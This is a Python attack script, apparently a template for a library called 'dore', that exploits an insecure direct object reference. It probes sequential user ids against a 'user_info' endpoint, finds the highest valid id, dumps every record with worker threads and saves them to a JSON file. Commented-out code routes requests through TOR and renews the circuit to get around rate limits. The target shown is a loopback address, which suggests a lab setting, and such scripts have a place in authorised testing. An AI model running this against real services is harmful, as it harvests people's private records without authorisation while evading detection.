#!/usr/bin/env python3
from dore import *
from time import sleep
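def save(juice, filename='out_dontAdd_.json'):
    """Write the collected records to *filename* as indented, key-sorted JSON.

    Persistence lives in this script rather than in `dore`, so the output
    format can be changed here without touching the library.

    Args:
        juice: JSON-serialisable object produced by the dump step.
        filename: Destination path; an existing file is overwritten.

    Raises:
        TypeError: If *juice* holds a value `json` cannot serialise.
        OSError: If the destination cannot be opened for writing.
    """
    # Imported locally so this function no longer depends on `json` happening
    # to leak out of the `from dore import *` wildcard import.
    import json

    # Explicit encoding: the file is read back the same way on every platform
    # instead of following the locale default.
    with open(filename, 'w', encoding='utf-8') as json_file:
        json.dump(juice, json_file, indent=2, sort_keys=True)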
def exploit(_id):
    """Probe one record id; return its decoded JSON body, or ``None`` on a miss.

    The function takes exactly one argument, the id to request. A response
    that ``match('resp_code', ..., 404)`` recognises counts as a miss and
    yields ``None``; every other response is decoded with ``.json()``.

    NOTE(review): the probe only yields data if the endpoint serves a record
    for whatever id it is handed. A per-record ownership check on the server
    would answer every foreign id with the same denial -- confirm against the
    target application.
    """
    endpoint = 'vulnerable.domain/api'  # template placeholder, overwritten on the next line
    endpoint = 'http://127.0.0.1:3117/user_info'  # loopback target actually used
    query = {'id': _id}

    # `request` is dore's wrapper around `requests.request`; it goes through a
    # local TOR proxy by default, and `local=True` switches TOR/proxies off.
    response = request(endpoint, params=query, local=True)

    # Disabled alternative: match on the JSON error body and retry after a 429.
    """
    if not match('json', resp, {'err': 'does not exist'}):
        return resp.json()
    elif match('resp_code', resp, 429): # Got rate limited, here..
        renew()
        return exploit(_id)
    """
    # Disabled reference list of the other matcher kinds.
    """
    ## Other simple examples of response matching ##
    if not match('json', resp, ['err']):
        return resp.json()
    if not match('regex', resp, '"err"'):
        return resp.json()
    if not match('regex', resp, 'does not exist'):
        return resp.json()
    if not match('resp_code', resp, 404):
        return resp.json()
    """

    # A 404 is the negative response; the caller expects `None` for it.
    if match('resp_code', response, 404):
        return None
    return response.json()
if __name__ == '__main__':
    # Script entry point: find the highest id that still answers, request
    # every id in [min_id, max_id] through `exploit`, and store the result.
    print(info(f'Started [at] -> {fetchFormatedTime()}'))

    # Disabled TOR bootstrap; only relevant when `renew()` is used.
    """
    if not is_root(): # You need to be root, for sending a HUP signal to tor
        print(info('Yoo -> `renew()` will not work..'))
    # Start TOR, if not started yet..
    is_active(
        'tor.service',
        start=True
    )
    """

    min_id, filename = 1, 'juice_dontAdd_.json'

    # `get_max_id` is handed the probe function and the id to start from.
    max_id = get_max_id(
        exploit,
        iid=min_id,
        verbose=0,
    )
    # print(max_id)
    clear_line()

    print(info(f'Now -> Dumping the whole thing from `{min_id}` to `{max_id}`'))
    # Two worker threads issue the per-id requests.
    juice = dump_all(
        exploit,
        min_id,
        max_id,
        threads=2,
    )
    clear_line()

    # min_id = 70
    # max_id = get_max_id(exploit, iid=min_id)
    # clear_line()
    # print(info(f'Again -> Dumping from second id range ( {min_id} to {max_id} ) now..'))
    # juice = dump_all(exploit, min_id, max_id, threads=40)
    # clear_line()

    # The file holds whatever records the endpoint returned.
    print(info(f'Done -> Now, saving it to `{filename}`'))
    save(juice, filename)
    coolExit()